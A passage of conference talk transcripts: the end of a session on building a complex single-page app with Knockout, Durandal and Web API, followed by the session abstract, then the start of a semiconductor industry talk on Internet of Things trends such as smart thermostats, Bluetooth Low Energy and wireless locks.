Yes. So what are the two-way bindings and what is giving us the two-way bindings? Knockout. Knockout is doing that. There are other ways to do that. Angular does it in a similar way. Backbone has their own ways of solving this. But ultimately, this idea of having the two bound together is really powerful. Knockout, you have to define it as an observable to get this goodness. That's one other benefit of Angular is you can use Pojo's, plain old JavaScript objects. You don't have to declare anything observable. It's just Angular is out there constantly looking for any changes in your JavaScript and saying, oh, that changed. Then let me go find the corresponding DOM elements. That sounds really inefficient, but it works pretty well. Unless you write something ridiculously complicated, there's been very few people that have been complaining about performance with Angular using this. How do I update many DOM elements when one changes? Computers can do that. Again, you could just say bindings again. That's what the bindings are doing. If I have three different DOM elements bound to the same value, then what's going to happen is when that value changes, all three of those DOM elements are going to change at the same time. Yes, computed observables. That was the other one that people were saying. So far, you're getting an A. Good deal. How should I move data between the client and the server? This is where there's a couple things going on. You need to be able to take all your JSON and turn it into a string. You can use JSON.stringify to do that. That works in all modern browsers. You can shim it in with JSON2.js, which I believe Douglas Crockford wrote. Thank you, Douglas, again. That's really useful so that you can get that data back to the server without having to explicitly convert it over to JSON. We centralized our service layer. I want to show you quickly how that works. One thing that I didn't mention is we're referencing jQuery in our app, but the amount of jQuery that is written in this app is hilariously small to the point that really the only reason it's in here is because I use Kendo UI for some of the UI, and Kendo has a dependency on jQuery. The only real jQuery that's in our app is this little fun right here. You probably recognize the jQuery$.ajax call. What I've done here is wrapped it all in a promise because we didn't want to use jQuery's promises, because, again, jQuery promises don't follow the promises spec. We're using Q instead, and we're coming in here and making all of our requests through this one line. If you look at anything else, so this is the library that makes the call, but by having every single aJax call run through this one method right here, then I have a lot of power because I can do things like this. I have a preloader that shows up. Remember how you were seeing from time to time whenever I was changing things? That preloader would show up. This is the place to do it because this is where I know that it's happening. You could say this is a bit ugly because it means that this service library knows a little bit about the UI. I don't have a real good solution for this offhand. You could use something like, I believe, postal, is it, where it could subscribe to these events that are happening, but I haven't gone down that road. Anybody use postal? I never see many hands on that. Congratulations, Gil. You're the only one. What's that? I haven't heard of postbox. Okay. Postbox is apparently similar. Nonetheless, what you see up here is if I look at any one of these files that are making the Ajax calls, for instance, Ajax calls for the deal. Here we go. What you find are one-liners because all I really need to define is the endpoint and pass the data in. Then I delegate everything to that Ajax service that I've set up. By the way, all that I'm showing you here, this is, again, this is something that isn't provided by Knockout. It's not provided by Durandal. This is my own creation here. If I were using Angular, Angular has their own opinions on how to do this. You can use their resource service, for instance, to just go in and say, all right, by convention, I created a RESTful API. If I followed the general pragmatic REST principles, then my URIs are going to be set up in a way that Angular makes it super easy to be able to do all of this. I spent a lot of time designing this. I'm really happy with how it worked out because, as you can see, every time we stand up a new Ajax call, all I have to do is define a get or a put, put in the URI and pass in the data, and it just works. The promises happen, and the UI does what it should, and I get the data back serialized like I'd like it to. That's pretty handy. Put the business logic on the server rather than the client. This is one of the other reasons that we aren't doing all our math on the client, was even if I minify and obfuscate it, somebody could go back and put all those little shredded pieces of paper back together, and effectively they have our application. Or maybe they don't even want to understand it. They can just copy and paste the whole thing and go host it elsewhere, and now they have a working solution because all they really need is a server on one side to provide some data. So we put everything we can over on the server in our spa, and making Ajax calls is not particularly expensive, so err on that side. Another thing to consider, how do I inject data from the server into my JavaScript on page load? And what I'm highlighting there is what I call the JavaScript configuration object pattern, and I don't have a slide on it, but if I pull up, let me do this. I'd help if I could type it. There I am. I've got a blog post on this that really sums it up. And the idea of the configuration object pattern is to take any data that the server knows that's needed on the client, send that data down on page load. If you know the client is going to need it, get it down there fast. And so let's go down here, and here's the example. Imagine that I have a single code base that's used by a bunch of different customers, and I have Google Analytics within there. I need to inject a different key for every single one of those customers. So I have all this static JavaScript sitting right here, and then this is the only thing that changes this one line right here, the Google Analytics key. Now the way that some people would want to solve this is go onto the server and then write all your JavaScript in one big string and then inject that variable from the database, right? And how many people have done that? That's a pretty common pattern. And it's problematic for a number of reasons. Now let me get to the solution first because we're pretty tight on time. Ultimately if you go into here instead and write all your JavaScript is just plain old JavaScript, put it in a JS file, then you can inject JSON into your page by using a JavaScript serializer in your language of choice. And C-sharp, I use the JavaScript serializer, there's JSON.net, whatever you want to use. Ultimately you want to take an object on your server, serialize it to JSON, spit it into the header of your page. And this is a pattern that's used all over the web. For instance, if I go to Google right now, you'll find, boy they have a lot going on, I think an easier example is if I go to Stack Overflow and look at their source, what you'll find is they do the same thing. If I go into here, you'll see stackexchange.net. So they're using what I call the JavaScript configuration object pattern to set all these things that are specific to me. The locale, off URL, all that is used by their JavaScript to make the application work. So have your server send down the knowledge that it knows right up front. And these are all the benefits of it. You separate your concerns, you get caching, you're minimizing your string parsing overhead. It is really painful trying to read JavaScript that isn't code colored and syntax checked when you make those typos. You're forcing somebody, if you write it on the server in a big string, then you're forcing somebody to think in terms of, okay, well, let's see, you're writing in Java or you're writing in C sharp, but this is a string that's ultimately going to be JavaScript. So these escape characters won't get sent down. And yeah, I don't have coloring, but I can see what you're doing. It becomes really hard to maintain and understand. So how do we organize all this JavaScript and HTML? Well compose small views and models. And that's what we saw. That's why we broke it down to almost 100 different files. Other than that one really large view model, most of our view models are 50-ish lines of code and most of our views are 50, 100 lines of HTML. They're solving small problems well. And the beauty of that is when I come over here and look at the app and we say, okay, there's, where's the app go? There's a bug right here under recent deals. Then I know what I need to do is come back over here and open recent deals or recent desks.html, the fact that it's named wrong is a separate political argument that I lost, but we won't get into that. And so you notice how small this is because this view is just handling that little tiny section right there that was listing the recent deals. So it gets really easy to quickly come in and I go, okay, well there's something wrong with the JavaScript. Well I know that's going to be in recent desks.js because that's the corresponding view model for this view. So here's the little bit of view model. And as you can see, it's a really small view model because there's not much logic here. You can load a desk, you can toggle whether it's showing, and you can determine whether the heading's visible. So, it's pretty simple stuff going on there. Durandal lets you compose views within other views. This is one of the really cool, powerful pieces of Durandal. And it's something that it does, I feel like, better than Angular right now. But Angular has some interesting things that it only does right now too. Angular's directives are really cool. And if you're anybody familiar with web components, next year a lot more people will be raising their hands. That's the direction that things are going. Web components are something that Angular's basically shimming in right now with their idea of directives. So it's a really powerful way to be able to remove the cruft in your code and think at a higher level of abstraction. So instead of having div, div, div, div, and then ul and all this, I can define that top level item with a tag name. For instance, if all those divs ultimately came together to be a voting button, then I could put the tag in as voting button. And all that stuff inside would just get thrown in. So pretty powerful idea. How do I avoid repeating myself? Have your server send everything down and then just use what your server did because your server can handle all this stuff. Don't go defining empty objects for your spa on the client. Have your server send down what's called a null object and empty object and then you can use that empty object throughout your application if you, for instance, need to add another row, that sort of thing. We want to have time to get to this movement. This is a really interesting conversation, though, about the style of JavaScript development over time. Ultimately, we are in a new era, though, and this era is data binding. This old idea of unattrusive JavaScript. It ended up there were some real problems with it. If I was using unattrusive JavaScript, I could not have built this application. It would have fallen down on itself and it would not have been maintainable. So data binding is, at the moment, the most promising future that we have. And it's definitely made things easier. And I won't go into this, but download the slides. You can see the difference here, though, that really the three different eras here. Dating, data binding is the way that we are writing JavaScript. Now I'm going to skip to the end here. Does building a spa even make sense? Well, not if you have proprietary business logic that you have to put down on the client or very little interactivity, slow page load. Ultimately, if the page is really called, then it's probably the wrong approach. It can also be a real pain to debug. There's a lot of downsides to doing single-page development. So if you don't need to, then I don't recommend doing it. You really need to be able to justify that a spa is the right approach. Now there are some good reasons why, though. It's very responsive. You can really get awesome interactivity. You can separate your concerns. And it's very, very simple. There are less abstractions in some ways over the code because you're sending down the real deal HTML. And you don't have to worry about debugging, too. That's one really nice thing. If you have an application with a really slow build time, I didn't have to pay any of that price because I was just playing in JavaScript plan. It's just save and load, save and load. So we built this very, very quickly. And ultimately, don't single-page all the things. This is the wrong mindset, right? What we need to think about is pockets of single-page applications. Look at your whole app and go, is there a place within this app where a single-page app makes sense? And our application is almost exclusively plain old web forms from way back when. But this is a pocket of single-page applications where we really thought it made sense. That's it. I'll be glad to take questions. Just come on up and visit. There's a few Pluralsight cards left. Thanks for listening. Thank you. Thank you.
Typical technology sessions walk through a trivial example application to give you a taste of the technology. So hey, let’s do the opposite! In this session we’ll dissect a highly complex single page application that's soon to be used by over 1,000 automotive dealerships to finance and sell cars. This is an HTML5 application that our Silverlight guys said couldn’t be built. We’ll walk through how to manage a pure client-side application with 1000’s of lines of custom JavaScript and review how Web API, Knockout, Durandal, RequireJS, KendoUI, and surprisingly little jQuery can join forces to make the browser sing. You’ll gain a clear understanding of when a single page app approach makes sense and learn how to pragmatically divide responsibilities between the client and server. And we’ll close out by comparing the performance of complex web apps in modern browsers to older versions of Internet Explorer. This session will give you an appreciation for how far you can push ultra-responsive client-side rendering in the real-world.
10.5446/50590 (DOI)
All right. Good morning and welcome to the session. So today I'm just going to give you a brief insight about the thing that we call Internet of Things. So people are sometimes sure what they're talking about when they say Internet of Things. Sometimes they're not. So it's actually a little fuzzy at most times. And I would actually contend that nobody really knows what they're talking about when they say Internet of Things. But they do know that, hey, this is something, this is going to change our lives. This is going to change how we're doing business. This is going to change how we are interacting with people. They really say that change. This is like the wind which is blowing. You really don't understand where it's coming from, where it's going to, but you know that you're right there in the middle of it. So looking back on the Internet itself, obviously, you guys or a lot of you people over here have been brought up with the Internet. So when you started going to work or to school, you actually had the Internet there with you. But before that, when the Internet really started disrupting things, this started with disrupting with commerce, online stores. So you see Amazon, you see a lot of industries which are getting, which have been disrupted. Amazon was with respect to selling of books. You started getting disruption in the telecom space, the way you're going to call your people, the way you're going to build relationships, messaging, and a whole bunch of stuff that's really which the Internet has disrupted. So it's really disrupting every facet of our lives. The way we interact with people, the way we interact with things, it's doing something quite different. Some of the people who, so when I really got into the Internet, it was clearly when I was at work. So I had no clue what this thing was when I was in Bidra Govindaya or at high school. So this was like a mind blowing thing that you could actually send email to people half a world away and be able to communicate with people whom you really never knew. So I was there in the first chat messenger, you know, message room with the Netscape navigator browser and whenever you want to send a message, you have to refresh the screen so the screen would refresh and then you would be able to talk to those people. You have no idea who they were. Of course, now today the Internet has changed. You pretty much know who they are. So that's this little comic strip that said, hey, nobody, in 1993, nobody knows that you're a dog when you're accessing the Internet. In 2010, everybody in the world knows that you're a dog. So it's changing and it's changing itself. So this is something that we would like to get a handle on, but I suspect that it's going to change a lot of our things and we don't, we would not truly be in control. But what I'm really going to give you is a bunch of insight which we see in the semiconductor business, which I've been working since I started working, that's supposed a couple of decades ago, and we see that before it hits the market. So we know trends because these things happen and you need to make the processors, you need to make the chips, you need to make sure that the customers who are going to deliver these things have to be done before it hits mainstream. So we see trends which you don't because the numbers are happening, the things are changing before they come to you. So we get in a different kind of insight compared to somebody who's actually looking at, you know, deployment numbers, looking at how many people are visiting these things, how many users that you have, those things are usually much further down the lane because things which we see significant would become significant in the real world maybe eight months later, maybe a year later. So these are some things that we have understood in the semiconductor business at Nordic Semiconductor when we're looking at this thing called Internet of Safe. Is it affecting our business? Absolutely. This is an elephant in the room. This is definitely affecting our business. And the good news is it's affecting it positively. But we'll try to understand how this is happening. So Amazon is, when it's initial stuff, is basically somebody's seeing, huh, this Internet thing is going to disrupt a lot of stuff. So I'm going to put up a store. I need to understand. So Jeff is Jeff Bezos is really trying to understand, okay, he's got one of you guys. He's seeing things happening. He's seeing, look, these things are going to change. It's definitely going to change things. So what can I leverage out of it? So he's sitting in his Wall Street office and trying to, and he's seeing these things because he's seeing it from the financial business. He's seeing this, ah, this is definitely going to change. So what can I leverage in the first place? The first thing that they basically, he understood was selling of books, CDs and things which had high demand. And you can see the, you know, things over there, the books, the music, the videos. Of course you had auctions in Amazon at that point of time because he thought auctions were the good thing. You could try that as well, right? But you can see that the traction really happened for the first three and Amazon is today, it dominates the book retail business. Good thing or bad thing is a different story. But an insight which was seen by somebody 20 years ago in 1994 has built them to us a position of dominance. So every time things change and you get an insight, there is opportunity. Now that was the web and the web continues to disrupt every industry. So be it, ah, we have the marriage business in India, you know, and that operates a little differently. There's a movie in, if you've heard of it, it's called Fiddler on the Roof and the song goes matchmaker, matchmaker, make me a match, find me a find and catch me a catch. Look through your books and find me a perfect match. And today, the perfect match and the matchmaker doesn't exist or it's been largely been replaced by matrimony sites. Okay. In the western world you have dating sites where people have to, you know, take the initiative to actually go ahead, find out whom to meet and again the internet has disrupted that space and in the traditional matchmaker space that, you know, I know this person, I know this family, that's a good girl and that's a good guy is being disrupted by matrimonial sites which actually try to match how would this person be a good fit for this person? Yes, for whatever logic that they follow for that. So it's disrupting everything and then we see, okay, and as you have talked about today, everybody's saying, oh, mobile, mobile is going to change everything now. All the people, you're going to get closer, it's going to become different. So yes, mobile is changing things but it's really part of the internet. It's not really any different, it's just a different manifestation of it. However, the semiconductor industry is heavily involved in this. These phones which you see would not have been possible if you could not cram a processor into that tiny little space. It would not have been possible if we didn't manage to run this on a battery which fits in the palm of your hand for a couple of days. It would not have been possible if we didn't allow any set of peripherals to be added to these things. So all of these things, we have a golden rule typically. If you're going to have a device which is there, like a mouse or a keyboard and it's battery powered, it needs to run for at least a year before you change batteries because one year people forget. Anything less than that, they would remember. In the phone set, if you initially started how the phones really started working, you know, you had these huge car phones which were there. And now we have this. But everything is really driven by advances in semiconductors. So if you're able to cram more stuff into it and we're able to see that, hey, people want these things, we would continue to go on that path. This path has already started. So the things that you had at desktop, we're going to see this in Amazon. You were watching this on a desktop computer, right? You have the same computing power on your phone today. An ASIC, the processor in an iPhone today is desktop grade. It's a 64-bit processor. It's desktop grade. It's really sitting inside your phone. You're really carrying a computer with you. It's created this ability to do things and you could process local information. You don't have to wait until it gets you to get to your desk to see what has happened. Everything is really changing. And this is not any different. I mean, it's just the same pathway of change that the internet is really disrupting more and more of these things. Of course, we see this example of Uber, which is changing the taxi cab industry. Whether they like it or not, the change is coming to them, kicking and screaming. So it's hard. So sometimes these things would make change, but the only thing is change which is constant. It could be good change. It could be bad change. That's something which is very difficult to control at that point. But all we are going to see is this thing of desktop to mobile phone, what next? Right? So reimagining day to day activity, everything is really work is being reimagined, money is being reimagined, relationships are how you get into a relationship is being reimagined. Books, calling your mom, booking your hotel room, everything is really changing. So that means this is actually creating a lot of opportunity for people who can see the opportunity. Right? So that means these things today, I mean, so I've run two startups before. So when I did the first one in 1999, it was hard to get a phone line in India. So I ran the startup of the city of Bangalore and we wanted to get a phone line. So we got a plonk down 2000 crowns, make a dozen calls, tried to go to this office of this telephone guy and try to get a phone line. The fun part is after we got the phone line, when you pick up the telephone, you wouldn't get a dial tone. Of course, most of you guys wouldn't know what a dial tone is. But that's the amount of change that the internet has really brought into the business because most of the cellular infrastructure here, which we have today and which we take for granted, is really running on an internet backplane. So things have changed. But the key difference is the cost of doing these things or changing these things has been reducing. Computing cost has been going down. So what was a big barrier of business earlier has shrinking? So today you have the same computing cost which you had on a desktop on your phone. So things are changing. So where is this going to take us? So it's changing the way we interact with things. And I'm going to show you some of the examples of where this trend has started already, where you see that more and more of inanimate objects are also changing. So one thing is for sure, person-to-person relationship or the way people communicate person-to-person is definitely changed. So all of that is ripe for disruption. So your Facebook, your one-on-one communication with WhatsApp or Snapchat, all of that is really changing anything that you do. So that's, it's typical. So most of web businesses, if you see today, would actually try to do that. Like Basecamp is managing projects. That's managing people. Okay, great. Then you have, you know, messaging application which help you manage your team. And I know every part of it in web, if you see a Web 2.0 application, most of these things is really people interaction. So people interact with the web. The app comes up, you interact with the app. But some things are going to change a little different. So meaning is inanimate objects, things which you just control, a light switch, a thermostat, your doors, your windows, all of this are going to get disrupted. And that's simply being driven by a lot of these, by semiconductor advancements. By which we're going to be able to deliver chips which do these things cheaper. They're going to consume less power than ever. They're going to be smaller than ever. You're going to be able to stick them in anything. People are already swallowing these things. And that was research like a couple of years ago today. The chips are so cheap that you could just sort of swallow it and it's okay. You can just write off the few dollars that, you know, that you need to lose when these things go through you. And then it's bio waste goes to be recycled or taken care of. So things are becoming cheaper. So that's basically, that means it's going to touch everything today. I'm just going to show you some one thing which has really changed. 2009, the energy star rating for thermostats for revoked. So if you see energy star, it's been there for a long time. It's a method by which people say, Hey, is your monitor energy star compliant? That means does it saving power when it's sleeping? Is it working in an energy efficient way? So they revoked programmable thermostats lost their energy star rating. I mean, you could say how in the world did this happen? Like I'm going to reduce my my energy consumption so I can program it to say, Hey, Monday, I'm at work. So yeah, in the day, you can cut off the heat. When I come back, you can slowly ramp up the heat. It didn't work. So it's a good thought. It didn't work. So most of the time people either forgot to do it or incredibly bad interfaces. So another learning that we have seen is in web, web is programming. You see Amazon's webpage earlier, that is so retro, right? Today you people you can do a B testing, you can look at long copy, short copy. What's going to make a big difference? What doesn't? Are these guys going to click that button if the button is yellow or did the button is green? What kind of text should we have over there? Should we say sign up now? Or should we say don't let your customer get away to and you know, click now. So right? So there are lots of ways which people have been experimenting with the web. Some of that is really rubbed off on other spaces. So, one for Bing. Intelligence. These things know you better than you know yourself. What you see in the web is also true. People know some things about you better than yourself. It's a scary thought. That's truth. Analytics knows more about your preferences, what you like, what you dislike, more than you. Because they have data, you don't. So it actually creates an opportunity in the device space. So basically the world around you can actually learn without you telling them what to do. I don't need a programmable thermostat, but I need to do the programming. We'll learn. We'll know when you're away, we'll know when you're in, we'll know when to cut the power. We'll know when you're going to come in, we'll know when you're going to start ramping up cooling or heating or whatever. We don't need your input. We would be invisible. But we would have the intelligence to serve you. So some of these things, we say, hey, it doesn't matter. Right? The problem was we don't do a good job of actually telling things or communicating this to a thermostat or sometimes to people who work with us, sometimes how we communicate. A lot of these things, there's something which is not easily captured. User interfaces help us get over a lot of these things. So good user interfaces have been brought in. And that's something which has really impacted how these things were going to work together with us. Of course, it also is important that to drive these good user interfaces, it did require some threshold of computing power before this was possible. So in the next case, the specific case, here's a learning thermostat. It's got a bunch of sensors which tell you whether you're in the house, out of the house. It has internet connectivity, so you could actually manage it from different places. But it has a very nice user interface by which things, by which you interact, is very familiar. You're not pressing buttons. It works in the same way as you would do a knob, changing it up or changing it down. It has a very interesting way by which you can actually connect it to your Wi-Fi. Now, connecting it to a Wi-Fi network anywhere is an interesting process, right? Because you go to select the base station and you're going to give it a password hum. This guy doesn't even have one user interface to do something like that. So they actually had a very interesting way to do it on this thing. But of course, with the raise of the mobile, you could do a lot of these things on the mobile phone. So a lot of these things which require setup can be done on the phone. You want to give somebody internet access? Sure. Set it up on the phone. Send the settings to the device. You're done. So these things are actually changing the way you interact because earlier, if you had a dumb device, setting it up was a pain. I remember configuring little devices by putting in UART ports or plugging a PC into it, sending some commands. Configuring a DSL modem was hard because you had to telnet into it and then you had to set some stuff. But today, you don't have to do that. You can set up everything on your mobile phone. Send the settings down to the device. You're done. User interfaces are going to make a huge difference when we're going to change this, when we're going to interact with devices. Meaning they're going to be so easy that they're going to seduce us and take over our lives. Very, very easy. The power of defaults, they would know the default. Anyway. Now, this is a very interesting thing. The way you do business is also changing. So you're looking at this and say, hey, how is Nest making money? Look, in the semiconductor business, we don't care about people or a lot of things, usually that you're going to buy 10,000 of midships. Okay, that's nice. We really think about it only when you're going to talk to me in a million units. That's when people pay attention because that's something that's happening. So that means we really need to be able to make this device stuff a successful thing. And I'm actually going to show you what's really happening with Nest. Nest is not just making money when they sell you a device. Sell you a thermostat. They make you some money. They're actually also making money by allowing utility companies to control your environment. Okay, so that means Nest gets paid when you sign up into their Russia rewards program that if there is a peak load coming up, that means the temperature is really increasing. There's a heat wave. You're going to turn on your air con and everybody in that region is going to turn on the air con at the same time, which is going to create a peak load. So when a peak load happens, you have additional power plants which are kept offline. And then you need to bring them online. So that means there's a sudden jump in the number of power plants which are consuming fuel, which is a couple of billion dollars in the United States. So Nest said, hey, that's an opportunity. If you sign up and tell the utility company that, okay, we can cut off your air con during rush hours. Using the maximum heat which is there, I'd pay you some money. But who would do that? I mean, normally you can't even take advantages of this opportunity, right? You can't go and tell, even if the electricity company had a program and you would say on my honor that I would actually go and switch off my air con even if there is a heat wave coming up, if there's opportunity to make this happen, it doesn't even exist. This is value created out of thin air, right? This is something which just because we had this device controlling your air con and heating that you could now cut a deal with Nest and your electricity company to say, hey, I agree. I'm going to let you cut off my air con when the temperature is going through the roof, meaning it's 30 degrees or 35 degrees and I'm going to let you cut this off. So how would you agree to that, right? So Nest says, look, I'm going to pre-cool your house so that when the rush hour hits you, when there is a peak load and you don't have your air conditioning on, I would actually pre-cool you on a non-rush hour rate or a non-rush hour time so that your house is cooler and when the heat wave is there or the rush hour is there, you don't need to have any cooling. So he says, it works both ways. I can take care of you and I can take care of the energy company and Nest receives part of the benefits and passes on some of the benefits to you. So look at this. This is not really something which is straightforward, right? It's not like, oh, I buy something and I pay for it. It's not direct value transfer. This is different. This is saying somebody can control your life and to mutual benefit, we would actually have a way that this is actually happening through an intelligent device. So today, if during the rush hour, if you go and say, oh my god, this is too hot for me, I'm going to make the cooler, then the Nest knows that during this hour, you actually lowered the temperature so you don't get the reward. So business models for these things is against something which is going to be very interesting to look at. More stuff. We have hotel industries. They were being disrupted. So you want to book a hotel. You know what you do? You go to TripAdvisor, you go to hotels.com, you look at all the reviews that they're there. You get a feeling of this is a good hotel or a bad hotel. You look at the worst reviews and say, is this guy biased or was it just a mistake on the hotel? You take a look at it. We will make a judgment and then you choose a hotel, right? Here you would use a travel agent or somebody. Now those people have been disintermediated a long time ago in the beginning of the internet. You still have use for travel agents, but the space has shrunk. Now we have Airbnb. That's disrupting the hotel industry, meaning you're bringing property into the business which didn't exist earlier. Of course, again, is this a good thing or a bad thing? I'm not commenting on that. The changes on us, that's whether we like it or not. The interesting part for us, of course, is it's actually driving adoption of wireless locks. Now we really see a lot of spaces. Now we look at, see, like we have mesh in Oslo. We have Diggs and Tronheim. We have a lot of business places where we want to go and when I'm traveling, I would like to actually have some quiet space for some time. I don't really need a hotel room. I need a few hours. I have a long layover between flights or I'm in a city when I need to talk to a client. I have a few hours and then I say, hey, I would like to have some time and I need to get some work done, but I don't want to be sitting in a hotel. That's one place where you see unattended access to these properties managed by Airbnb. There are a lot of other websites which are there. Things like Brethers, places like Mesh and access to Mesh would actually be managed by a central directory. I can synchronize with my outlook and that guy's outlook. You could actually sync up to say, hey, I'm reserving this two-hour slot. Then what do you do? You get a call. You get a call in your phone to say, this is the code to access. You go there, punch in the code, voila, you're in. You've actually taken that out. The next part is, okay, you're renting out a room, you're renting out something. You need to get that cleaned, right? Who lets in the cleaning lady? Does she have keys to all of these places? No, you can schedule that as well. This is actually inverting that industry, really enabling that industry to actually go further than what had to. We have this co-working space in Trondheim and it's called Diggs. Before they set up their lock management system, they had keys for everybody. They're like 40, 50 keys hanging around with lots of people, impossible to manage. You can't let in the right people. You don't know who went in, who went out. These things are changing the way, so you could actually push codes to people. You can revoke the codes. It's actually enabling this change. This is the internet changing things and the internet of things changing this further. The things which are there, like locks, thermostats, we see clear direction over there. I'll tell you why more things are going to follow. This is a slope. It's already, it's just on the path already. The portable computer with internet access, that's really your phone. The bicycle of the mind, well, that's really a term which was, which the first Macintosh should have had. It was supposed to be a bicycle of the mind, a computer is really a bicycle of the mind. But now you have this thing to assist you everywhere. Great. Now you have computational power. That's raw computational power. You can go and look up stuff. You have internet access on it. But now this guy, A, can act as an intelligent hub for the devices around you. So that means intelligence is on the phone. He looks at all the data around you and you make decisions and makes decisions on your behalf. So you're not really consulted to it because once the infrastructure is in place, it believes that it would work in your benefit for the infrastructure to make the decisions. That's interesting and scary. One more thing was that the iPhone really changed things. It really changed things was you had a great computer in your hand, but it sucked. It sucked big time. So I've been in the industry before the iPhone. So you had the Palm OS, you had the pocket PC, you had Blackberry. Those are the devices by which you interacted. And you could do limited things. So that means the business is focused on, okay, you can do email, you can do limited internet, you can do calendar. So if you looked at a Palm OS device from a long time ago, it had four buttons. It said, yes, you can do notes, you can do reminders, you can do contacts, you can do emails. So that's four buttons for it. That's it. So computers or mobile devices on that day were very specific or very targeted, but the iPhone really changed it in which computational power was sufficient to make a big deal out of user interfaces. So user interfaces like touching the screen are really computer intensive and battery intensive as well. So these things, it was really something which said, look, things are going to change. So this is truly, I would say, the first computer which was accessible to do a lot of stuff. Now that's interesting. So where do we see these devices? Now we have a lot of these devices. And you saw that the thermostat was there. Where does the thermostat get its power? He's going to do Wi-Fi. He's going to do internet access. How in the world did he do that? The way he did it was to steal power from thermostat wires. So the lines by which he could control the furnace and the aircon were powered lines. So the thermostat was stealing a little bit of juice from it and keeping his internal battery charged so that he could have his UI, his Wi-Fi, everything running without any problem. But that really creates a problem because you're restricted to devices which are connected to the mains or have some power attachment. So one thing which technology is doing today is driving power consumption lower. So how low is low? Low enough that you can have a solar panel powered inside the house with ambient light. So you can use that with enough power to carry over when there is no light. So that's the kind of power numbers that we're talking about. So it's really small batteries. And the advantage is it really puts these, you can put these devices in everything. So we see things like people are putting them in forks. I mean, why in the world would a fork want to be an internet of things? Or what in the world are these people doing? Well, I don't know. But it's possible. And sometimes people try to say, hey, are you eating a lot of these things? How fast are you eating? How slow are you eating? Because the speed of eating apparently tries to tell you whether you're feeling full quickly or whether you will eat more. So apparently if you eat slowly, then you get full with less amount of stuff getting in. So that means your intake is reduced. Well, that's apparently what the fork does. It tells you the weight, the rate of eating. Interesting. Maybe that's a specific segment which cares about that. Well, I don't know. But the point is that it actually is enabling things which you could not really imagine. And I wouldn't have imagined these things because, oh, my God, we need a big battery to deal with these things. No, we don't. So today things are changing. So anything really can get onto the internet via the phone. That's one thing. You could get onto the internet via a gateway in your house which can be your Wi-Fi router itself which has Bluetooth. So this change was driven by Nokia. So Nokia really said when Nokia was the king of the road before the iPhone, they had the vision and the insight to say, hey, we want something to connect to our phones which doesn't kill the battery on our phone plus it can run on really, really small batteries for a very, very long time. So that's the vision which Nokia had. And they said and they came to us and said, because we've been working on this 2.4 giga space for a long time, which is proprietary. So we say, hey, how does it go? So let's work together. So we worked together for some time. We realized and we also had that, look, it makes sense to move it into a standard's body. So we actually went to the Bluetooth SIG and said, hey, we have this technology. We'd like to make it standard. We're going to give it royalty-free to everybody. Everybody can leverage this. And since this is a standard, I'm not going to screw you. You're not going to screw me. Everybody's going to be on the same standard. Then we can be able to build more things. Remember, semiconductors, we need to sell millions. 10,000s, 100,000s are nice. We need to sell millions. So the point is enable million chip markets is good. So that means standards are good for us. We like to do that because it takes away the fear from people's mind that I'm going to get locked to this vendor. Oh, this is a great guy. But what if he goes over to business? What happens if I don't get his chips? What happens if the supply chain has a problem? What happens? What happens? All of that is there. So standards-based stuff has always been strong drivers of growth in the industry. So whether it be the GSM cellular standard, which Scandinavia and Norway specifically has contributed a lot, or internet standards, IP, which has driven the web, and today with low-power connectivity, we see Bluetooth leading the way. In any case, it provides autonomy of devices. Small batteries with no need to go to the mains really drives a lot of autonomy. You could do things which you could not do earlier. You could also power it by motion, by walking. That's enough power to drive these things for like hundreds of milliseconds. It doesn't have to be there all the time. That's something which we need to understand when we say the internet is coming to these things as well. But I think IP addresses, I like to ping my IP addresses, I like to do management of IP addresses. It's not true 100% of the time. You know that Skype had to change its architecture because people were using more of it on the mobile phone and they centralized it because there are lots of other rumors about why they did it as well. So Skype, if you know Skype, is a VoIP calling infrastructure. It was using a peer-to-peer connection. That's good. But it peer-to-peer works. If everybody is on the internet, if everybody is desktop grade, then you can do peer-to-peer. Suddenly what happened when these mobile phones started coming, people would be on the internet for some time and then they'll plonk out. So oops, I can't use that P2P node. Oh, that super node was not supposed to be used as a super node because it turned out to be an iPhone and not a PC. Problem, right? So they adapted that they centralized everything. So basically it said peer-to-peer doesn't work for us, but let's centralize it. And since the infrastructure is robust enough, that was okay. So the same thing has to happen. So when you're going to work with these devices with small batteries which are available for short periods of time, the ability to manage these devices and work with the internet at the same time is gold. The next one is to say, hey, I told you that, look, adding intelligence to your app, so your app will make decisions. Adding intelligence to the clouds, the cloud will make decisions. It's already happening. Some of those things are like your thermostat. And we see today that in Bluetooth, for example, the things which use very little power, we see two things, two of, two, few more than one thing. Recon, which shows certain things, which tell you position information, which give you hints about what is happening at a certain point at a certain time. Wearables. So a wearable can tell you whether you're sleeping. So you're looking at a TV, or basically the Netflix guys did this for a summer project or a hackathon or whatever. So they actually created something by which they could track your Fitbit and say you have fallen asleep in front of the TV or the Netflix stream, and they will pause the movie right over there. Amazing. But remember that. This is something just happens. Did you do it? Did you ask them to do it? They just did it, right? So it's possible that these things would provide you defaults, which are a lot nicer to you. They actually take care of your behavior. They actually take care of how you would like. Maybe you like to fall asleep in front of the TV with the TV running. So every time he does this, oh, you wake up and you go up, go and go and go to the bedroom. That behavior would actually get noticed and it would actually modify behavior. It's possible for them to do that because it knows that every time I did this, you wouldn't continue to sleep. You woke up. The data is already there, right? So all of this information is providing intelligence to these apps. It's really giving you something which could not have been that. Contextual information. Of course, these are personal and private information as well. But this is there to serve you. So that's the whole point. To make a better default. So remember, you know the way we work is we are susceptible to a few things. For example, if anybody says free, we are dead. We're just going to just do that free thing or whatever that free thing is. Free email, free web mail, free shipping. That's going to kill us one of these days. But that's what we are. In the minute somebody says free, we just do it. I don't know what it is. We just do that thing. So a better default for us. The defaults are powerful. Everywhere you say, whether you have a web app or something, the checkbox which says, I agreed to, when you sign up to say I agree that I will receive newsletters from all over the world, from all our partner companies, and I will have no way to unsubscribe from them. Yes, that would be the default. So the defaults are powerful. So what these intelligent devices and intelligence that we see is happening is to make a better default for your life. That the lights go off and save you power, save you money. That you actually can contribute or take advantage of programs or providers which are trying to make the world a better place. For example, the power companies do not want additional power plants to go online because that's inefficient for them and it's a horrible thing for the environment as well. So it's both ways. So it's really a better default. We want to bring about a better default. So today we see beacons, variables like Fitbits, things like tile, that's really small stuff. You stick it to anything. So you can actually make anything an Internet of Things today because you can take this tiny little device and stick it on anything, whatever. Now what value you get out of it? That's a different problem. Yeah, the Internet of Bluetooth could also do a six-low pan, sure, but it doesn't matter. The whole thing doesn't matter at this point. The point is that advantage would be there for anybody or anything or any company who actually can work with devices which are going to be there on the Internet for brief short bursts. So you could actually figure out what to do, what not to do from those devices, get the information that you want, manage them well, manage the power well, and they give you 